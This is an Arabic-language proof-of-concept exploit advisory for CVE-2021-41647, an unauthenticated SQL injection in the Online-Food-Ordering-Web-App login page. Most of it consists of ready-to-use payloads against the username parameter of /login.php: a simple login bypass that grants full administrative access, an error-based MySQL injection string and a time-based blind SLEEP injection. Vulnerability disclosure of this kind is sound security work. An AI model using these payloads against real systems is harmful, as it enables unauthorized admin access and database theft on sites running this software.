
استغلال لإثبات المفهوم لحقن SQL غير موثقة في تطبيق Online-Food-Ordering-Web-App، يوضح تجاوز تسجيل الدخول وتقنيات الحقن الأعمى القائمة على الخطأ والوقت.
CVE-2021-41647 حقن SQL في تطبيق Online-Food-Ordering-Web-App
تطبيق Online-Food-Ordering-Web-App عرضة لهجمات حقن SQL العمياء الزمنية والمبنية على الأخطاء غير المصادق عليها. لا يقوم معامل username في الصفحة /login.php بتعقيم إدخال المستخدم، مما يمكن المهاجم من تجاوز تسجيل الدخول باستخدام تقنية تجاوز بسيطة.
الرابط: /login.php
المعامل: username
لتجاوز تسجيل دخول المستخدم والحصول على وصول إداري كامل، استخدم الحمولة التالية في حقل إدخال اسم المستخدم: user' or 1=1-- -
المعامل: username (طلب POST)
النوع: قائم على الأخطاء
العنوان: MySQL >= 5.0 AND error-based - بند WHERE, HAVING, ORDER BY أو GROUP BY (FLOOR)
الحمولة: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf
النوع: أعمى زمني
العنوان: MySQL >= 5.0.12 AND time-based blind (استعلام SLEEP)
الحمولة: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

Jason Colyvas
MOBIUSBINARY
20 سبتمبر 2021